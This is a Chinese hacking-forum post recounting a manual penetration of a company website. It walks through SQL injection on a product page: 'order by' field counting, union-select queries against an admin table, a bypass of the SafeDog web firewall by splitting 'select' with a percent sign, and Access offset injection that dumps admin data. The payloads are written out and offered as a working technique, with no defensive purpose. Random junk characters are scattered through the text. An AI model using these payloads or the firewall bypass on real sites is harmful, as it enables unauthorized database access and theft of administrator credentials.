找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1935|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。; b; ^# C7 D$ x/ q5 P: a: [. ~
' S3 m2 x- i8 p& H+ e  T+ [

2 P1 V5 r$ H6 a+ b( x顺手加个admin, V) _  q$ ]% n7 _% j; l3 ?& }
  y( c2 W; I; g# C4 b3 O. H* d

5 `2 \2 w! Q" d8 w( g% r默认后台。
# g6 m8 h4 y" n6 [1 b- ^5 Z回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
8 y: r7 Q, K" [) v3 J7 R1 |2 J6 p
) }5 o4 T! x3 Q& r2 J, _+ z3 A  ^! o6 h- j2 a/ N

, s, Q7 m+ W1 L& C所以就不用御剑扫了,待会直接封IP。% Y& F* }7 k, c. Q* H# V

. A. n( Z, |- L: c2 c用order by语句判断是否存在注入。
0 H; `) F* O0 v' fhttp://www.xxx.com /product_show.asp?id=997 order by 1; H) c6 D6 C6 w3 Y8 e& v, Z: I' W
http://www.xxx.com /product_show.asp?id=997 order by 100
: t$ r8 D/ ?& w( G) d! V现在存在注入,经测试后发现是9个字段。! x$ c* g0 \, M0 ?

, }& g* a/ J1 @接下来进行联合查询,猜是否存在admin表。
% M1 l+ L; X0 M0 x( V+ x6 z: M! @http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
( C1 w; N" x5 j0 ~* o0 o" {4 T4 C  D0 g* l; \; F
; \& O# E  E. U# |; Q8 y* d5 w

; |6 U$ a8 Q1 I7 Y' D9 n$ [1 ^7 c在select中间加个%,se%lect绕过安全狗。7 y, _( P7 M2 _$ |' M  c5 H. Y
* w0 {1 q4 l/ S3 S

2 z0 K: Z9 _& g  I( ?" d2 O发现存在admin表,然后开始手工猜常用的字段。
$ x9 m3 a& q0 a- I) [) G纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
2 j# T/ C0 C4 J$ l$ p8 c( c' }
' a7 p% x* e9 l' b' f5 _, M* V突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。9 w5 R* A/ I  ^: ]* I
1 q+ G9 \, Y8 _/ g. M
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。- T, g4 {8 T' @! t9 X! j
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
* B) X: I9 w% q; D/ O. o' G. @- E好了,敏感内容出显了。​
# @) R: u! H: i# c6 }/ p  {+ B4 V
: k% D2 s5 z) F% u
+ z" }: x1 w1 m) b1 b" m# B! {, |8 |3 S; m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表